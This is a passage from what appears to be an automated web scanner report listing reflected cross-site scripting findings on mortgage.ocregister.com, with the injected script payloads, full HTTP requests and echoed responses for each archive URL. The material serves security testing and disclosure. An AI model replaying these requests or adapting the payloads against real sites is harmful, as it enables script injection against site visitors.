Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10/?b7a6b\"><script>alert(1)</script>aa7394ea76f=1feed/" />
...[SNIP]...

1.237. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78913"><script>alert(1)</script>415c27e9059 was submitted in the REST URL parameter 1. This input was echoed as 78913\"><script>alert(1)</script>415c27e9059 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200778913"><script>alert(1)</script>415c27e9059/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200778913\"><script>alert(1)</script>415c27e9059/11/feed/" />
...[SNIP]...

1.238. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a46"><script>alert(1)</script>b3caab2696d was submitted in the REST URL parameter 2. This input was echoed as 55a46\"><script>alert(1)</script>b3caab2696d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/1155a46"><script>alert(1)</script>b3caab2696d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/1155a46\"><script>alert(1)</script>b3caab2696d/feed/" />
...[SNIP]...

1.239. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88ca"><script>alert(1)</script>829bb9d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d88ca\"><script>alert(1)</script>829bb9d7991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/11/?d88ca"><script>alert(1)</script>829bb9d7991=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/11/?d88ca\"><script>alert(1)</script>829bb9d7991=1feed/" />
...[SNIP]...

1.240. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bb0"><script>alert(1)</script>5b51746308e was submitted in the REST URL parameter 1. This input was echoed as 83bb0\"><script>alert(1)</script>5b51746308e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" />
...[SNIP]...

1.241. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" />
...[SNIP]...

1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" />
...[SNIP]...

1.243. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" />
...[SNIP]...

1.244. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" />
...[SNIP]...

1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01/?1fd34\"><script>alert(1)</script>6eeaa914028=1feed/" />
...[SNIP]...

1.246. http://mortgage.ocregister.com/2008/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3080f"><script>alert(1)</script>0eba11e28c7 was submitted in the REST URL parameter 1. This input was echoed as 3080f\"><script>alert(1)</script>0eba11e28c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20083080f"><script>alert(1)</script>0eba11e28c7/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083080f\"><script>alert(1)</script>0eba11e28c7/02/feed/" />
...[SNIP]...

1.247. http://mortgage.ocregister.com/2008/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2dc"><script>alert(1)</script>3615908630 was submitted in the REST URL parameter 2. This input was echoed as be2dc\"><script>alert(1)</script>3615908630 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/02be2dc"><script>alert(1)</script>3615908630/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02be2dc\"><script>alert(1)</script>3615908630/feed/" />
...[SNIP]...

1.248. http://mortgage.ocregister.com/2008/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44db"><script>alert(1)</script>debe3db6973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44db\"><script>alert(1)</script>debe3db6973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/02/?c44db"><script>alert(1)</script>debe3db6973=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02/?c44db\"><script>alert(1)</script>debe3db6973=1feed/" />
...[SNIP]...

1.249. http://mortgage.ocregister.com/2008/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfaad"><script>alert(1)</script>feb9e55050e was submitted in the REST URL parameter 1. This input was echoed as cfaad\"><script>alert(1)</script>feb9e55050e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008cfaad"><script>alert(1)</script>feb9e55050e/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cfaad\"><script>alert(1)</script>feb9e55050e/03/feed/" />
...[SNIP]...

1.250. http://mortgage.ocregister.com/2008/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58700"><script>alert(1)</script>3e5461fd9e3 was submitted in the REST URL parameter 2. This input was echoed as 58700\"><script>alert(1)</script>3e5461fd9e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/0358700"><script>alert(1)</script>3e5461fd9e3/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
